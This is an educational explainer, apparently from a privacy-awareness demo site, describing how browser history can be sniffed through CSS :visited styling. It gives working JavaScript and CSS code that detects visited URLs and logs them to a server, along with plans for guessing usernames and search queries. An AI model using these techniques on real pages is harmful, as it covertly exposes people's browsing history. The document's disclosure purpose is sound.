The main goal for this website is to educate Internet users about how much and what kind of data can leak from their browsers' history and cache. On this page we aim to provide some technical background about the history sniffing techniques we're using to gather that information. It is important to note (and extremely frightening at the same time) that the techniques themselves have been around for many years and have been successfully used in several more limited scenarios (a full list of references is provided at the bottom of this page).
Implementation
For our current demos, we use two history sniffing techniques -- one based on JavaScript and one on CSS -- both utilizing the fact that visited links can have special styles applied to them.
JavaScript
The JavaScript method is based on the ability to inspect the computed style of
a link (an a element) and is the most convenient approach for determining whether a
particular URL has been opened in the browser.
We first create a CSS rule for visited links, for example:
<style>
a:visited { color: red; } /* We can also use any other CSS property */
</style>
We can then create elements in JavaScript, linking them to URLs from a known list, and then check the color of the elements. For example, the code could look like this:
var url_array = ['http://google.com', 'http://yahoo.com'];
var visited_array = [];
var link_el = document.createElement('a');
// The computed style object is live, so it reflects each new href set below
var computed_style = document.defaultView.getComputedStyle(link_el, "");
for (var i = 0; i < url_array.length; i++) {
    link_el.href = url_array[i];
    if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
        // The color was red, so the link was visited
        visited_array.push(url_array[i]);
    }
}
After all links have been checked, visited_array will contain
all the ones which have been identified as visited in your browser history.
Note that the link element does not have to be added to the DOM, and
therefore doesn't really have to be rendered, meaning that we can check
many links very quickly.
CSS
Using the :visited pseudo-class on a elements, it is possible to specify a background-image property which will make a request to the server if a particular link has been visited. We can thus achieve the same goal of determining visited links without using JavaScript. For example:
<style>
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1"></a>
<a href="http://yahoo.com" id="link2"></a>
If link1 (http://google.com) has been visited, the browser will make a request back to the server to retrieve the background for the #link1 rule. By appending a different URL argument to each rule we can determine which of the links were visited. Please note that this requires no client-side scripting whatsoever, and only relies on the availability of CSS.
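For a longer URL list, the rules and anchors would presumably be generated rather than written by hand. The following is a minimal sketch of such a generator, not the code used on this site; the function names buildCssProbe and escapeAttr, and the /log endpoint passed as logPath, are assumptions made for illustration.

```javascript
// Escape characters that would break out of a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

// Build one :visited rule and one anchor per URL.
// `logPath` is a hypothetical server endpoint that records each request.
function buildCssProbe(urls, logPath) {
  var rules = [];
  var anchors = [];
  for (var i = 0; i < urls.length; i++) {
    var id = 'link' + (i + 1);
    rules.push('a#' + id + ':visited { background-image: url(' +
               logPath + '?' + id + '_was_visited); }');
    anchors.push('<a href="' + escapeAttr(urls[i]) + '" id="' + id + '"></a>');
  }
  return '<style>\n' + rules.join('\n') + '\n</style>\n' + anchors.join('\n');
}

// Example: markup for the two links used above.
var probeHtml = buildCssProbe(['http://google.com', 'http://yahoo.com'], '/log');
```

The server would then only need to record which ?linkN_was_visited requests arrive for a given page view.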
Performance
While we're still conducting more accurate measurements, we did want to share some
initial results gathered using a virtual machine on an old dual-core system (likely
much slower than what you have on your desk).
The browsers used for this test were: IE7, FF3, Opera 9, Safari 3.2 and Chrome 0.9.
Part of the difference between the browsers can be attributed to the fact that some
browsers require slightly different JavaScript (for example, in IE the a
element must first be added to the DOM; not all other browsers have this requirement).
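A variant that attaches the link to the DOM before reading its style might look like the sketch below. It is an illustration under assumptions, not our optimized per-browser code: the function name isVisitedAttached is hypothetical, the document is passed in as doc so the function can be exercised outside a browser, and the fallback to currentStyle for older IE versions (which lack getComputedStyle) may report the color in a different format, so the expected string is a parameter.

```javascript
// Check a single URL with the link attached to the DOM first.
// `doc` is a Document-like object; in a browser, pass `document`.
// `visitedColor` is the color string expected for visited links
// (assumption: the caller knows the format its browser reports).
function isVisitedAttached(doc, url, visitedColor) {
  var link = doc.createElement('a');
  link.href = url;
  doc.body.appendChild(link); // required by some browsers, e.g. IE

  var color;
  if (doc.defaultView && doc.defaultView.getComputedStyle) {
    color = doc.defaultView.getComputedStyle(link, '').getPropertyValue('color');
  } else {
    color = link.currentStyle.color; // legacy IE path
  }

  doc.body.removeChild(link); // keep the page clean between checks
  return color === visitedColor;
}
```

Attaching and removing an element for each check is slower than reusing a detached link, which is one plausible reason for part of the per-browser difference.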
It is easily seen that even the slowest browser (Internet Explorer 7) could check up to 150,000 links a minute. Faster browsers can easily query for over a million links per minute. There are several ways of speeding up the checking process even more (including downloading more links in parallel with the checking process and conducting CSS and JavaScript tests concurrently). We will be posting updates soon.
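To put these rates in perspective, the time needed for a list of a given size is simple arithmetic. The helper below is only an illustration (the name secondsToCheck is hypothetical), and the rates are the rough figures quoted above rather than new measurements.

```javascript
// Seconds needed to check `linkCount` links at `linksPerMinute`.
function secondsToCheck(linkCount, linksPerMinute) {
  return linkCount * 60 / linksPerMinute;
}

var slowest = secondsToCheck(10000, 150000);  // 4 seconds at the IE7 rate
var faster = secondsToCheck(10000, 1000000);  // 0.6 seconds at a million links per minute
```

So even at the slowest measured rate, a list of 10,000 links takes about four seconds.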
If the number of links which can be checked seems high to you, note that our link checking code has been heavily optimized for each browser to get the best performance in each case.
Gathering links
Of course the Web contains trillions of resources, so even with a very fast computer, it would be impossible to scan all of them. We thus need a way of figuring out which links to check for.
For our tests, we chose different kinds of websites, dividing them into groups, similar to what you can see in the test list on the left of this page. For each website, we gathered a few hundred most popular links from that domain; if it turns out that you've visited one of the main links for that website, your browser will receive all the "secondary" links associated with it. For example, if you've visited http://google.com, our algorithm searches your history for Google Maps, Google News, and many other Google pages. We also crawl some websites completely and gather all available links (for example for our Wikileaks test).
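The two-stage idea can be sketched as follows. This is a simplified illustration under assumptions: the function name scanSites and the shape of the sites list are hypothetical, isVisited stands for any visited-check (such as the computed-style test described earlier), and the secondary links are shown inline, whereas on this site they are sent to the browser only after a main link has matched.

```javascript
// `sites` is a list of { main: url, secondary: [urls] } records (hypothetical shape).
// `isVisited` is any function that returns true for a visited URL.
function scanSites(sites, isVisited) {
  var found = [];
  for (var i = 0; i < sites.length; i++) {
    var site = sites[i];
    if (!isVisited(site.main)) {
      continue; // main link not visited: skip all secondary links for this site
    }
    found.push(site.main);
    for (var j = 0; j < site.secondary.length; j++) {
      if (isVisited(site.secondary[j])) {
        found.push(site.secondary[j]);
      }
    }
  }
  return found;
}
```

Skipping the secondary links of unvisited sites keeps the number of checks, and the amount of data downloaded, roughly proportional to the sites a visitor actually uses.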
We also monitor a majority of the Net's most popular RSS feeds and constantly look for new links to scan for (check out the news test to see which of the recent news stories we can detect in your history).
For a few tests of social news sites, we've also gathered the links to tens of thousands of user profile pages to see if we can guess your username; see our Digg, Reddit and Slashdot tests.
In addition to all that, we're testing for links to the Google and Bing search results for popular queries: if you've used any of those search engines in the past few months and searched for a hot term such as "michael jackson", chances are that our search engine test will detect it (subject to some limitations).
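As a rough illustration, candidate search-result URLs could be produced from a list of queries as in the sketch below. The URL templates, the use of + for spaces, and the function name buildSearchUrls are assumptions for the example; a history check only matches a URL exactly as the browser stored it, so real result URLs with extra parameters would need their own variants.

```javascript
// Assumed URL templates; real result URLs often carry additional parameters.
var SEARCH_TEMPLATES = [
  'http://www.google.com/search?q=',
  'http://www.bing.com/search?q='
];

// Build one candidate URL per (query, search engine) pair.
function buildSearchUrls(queries) {
  var urls = [];
  for (var i = 0; i < queries.length; i++) {
    // Encode the query, then use "+" for spaces (an assumption about the stored form).
    var encoded = encodeURIComponent(queries[i]).replace(/%20/g, '+');
    for (var j = 0; j < SEARCH_TEMPLATES.length; j++) {
      urls.push(SEARCH_TEMPLATES[j] + encoded);
    }
  }
  return urls;
}

var candidates = buildSearchUrls(['michael jackson']);
```

The resulting list can be fed to the same visited-link checks as any other URL list.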
However, don't be surprised (or relieved) if you've visited websites which aren't showing up on the list -- our goal isn't to give you a complete list of all websites you've visited but rather to show you how much of your history can be viewed in a few seconds by anyone who bothers to look.
Limitations
While the history sniffing techniques we present have a lot of potential to determine your browsing habits, they are (luckily) subject to some limitations. The most important thing to note is that websites can only be detected as visited if they're currently listed in your browser history. If you completely clear your history, nothing can be detected, at least until you start browsing again. Also, if you use different browsers or browser profiles, techniques such as ours can only detect the history in the browser/profile you're currently using.
Depending on your browser and whether you've customized your settings, some websites you visited might be purged from your history after a while (usually after three months, but some browsers, such as Google Chrome, keep them indefinitely). Also, websites opened while in "private browsing" ("porn") mode will not be shown.
Finally, using the approach we chose, we can't detect whether you've viewed individual page components (for example, whether you've seen a particular photo) unless you've visited the direct link for that component.